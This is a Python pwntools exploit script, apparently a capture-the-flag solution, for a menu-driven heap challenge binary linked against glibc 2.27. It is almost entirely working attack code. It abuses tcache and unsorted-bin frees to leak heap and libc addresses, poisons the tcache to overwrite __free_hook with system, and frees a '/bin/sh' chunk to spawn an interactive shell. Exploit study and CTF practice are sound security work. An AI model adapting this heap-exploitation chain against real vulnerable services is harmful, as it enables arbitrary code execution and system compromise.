from pwn import * import os import struct import random import time import sys import signal
salt = os.getenv('GDB_SALT') if (os.getenv('GDB_SALT')) else ''
def clear(signum=None, stack=None): print('Strip all debugging information') os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt)) exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, clear)
try: gdb_symbols = ''' '''
f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') f.write(gdb_symbols) f.close() except Exception as e: print(e)
context.arch = 'amd64'
execve_file = './source'
sh = process(execve_file)
elf = ELF(execve_file) libc = ELF('./libc-2.27.so')
try: gdbscript = ''' '''
f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') f.write(str(proc.pidof(sh)[0])) f.close()
f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') f.write(gdbscript) f.close() except Exception as e: print(e) def malloc(size, content): sh.sendafter('which command?\n> ', '1'.ljust(4, '\0')) sh.sendafter('size \n> ', str(size).ljust(4, '\0')) sh.sendafter('content \n> ', content)
def free(index): sh.sendafter('which command?\n> ', '2'.ljust(4, '\0')) sh.sendafter('index \n> ', str(index).ljust(4, '\0'))
def puts(index): sh.sendafter('which command?\n> ', '3'.ljust(4, '\0')) sh.sendafter('index \n> ', str(index).ljust(4, '\0'))
for i in range(10): malloc(0xf0, '\n')
for i in range(9): free(i)
free(9)
for i in range(10): malloc(0xf0, '\n')
for i in range(7): free(i)
free(7) malloc(0xf0, '\n')
free(8)
malloc(0xf8, '\n') free(0)
free(9)
for i in range(9): malloc(0xf0, '/bin/sh\0')
free(0) free(1)
puts(9)
result = sh.recvline()[:-1] heap_addr = u64(result.ljust(8, '\0')) - 0x310 log.success('heap_addr: ' + hex(heap_addr))
malloc(0xf0, '\0')
free(2) free(3) free(4) free(5)
free(0) free(9)
malloc(0xf0, p64(heap_addr + 0x260))
malloc(0xf0, p64(0))
malloc(0x8, p64(heap_addr + 0xa18)[:7])
puts(0)
result = sh.recvline()[:-1] main_arena_addr = u64(result.ljust(8, '\0')) - 96 log.success('main_arena_addr: ' + hex(main_arena_addr))
libc_addr = main_arena_addr - (libc.symbols['__malloc_hook'] + 0x10) log.success('libc_addr: ' + hex(libc_addr))
free(1)
malloc(0xf0, p64(heap_addr + 0x260)) malloc(0xf0, p64(0)) malloc(0x8, p64(heap_addr + 0xa10)[:7])
free(1) free(3) malloc(0x8, p64(libc_addr + libc.symbols['__free_hook'])[:7]) malloc(0xf0, '\0') malloc(0x8, p64(libc_addr + libc.symbols['system'])[:7])
free(0)
sh.interactive() clear()
|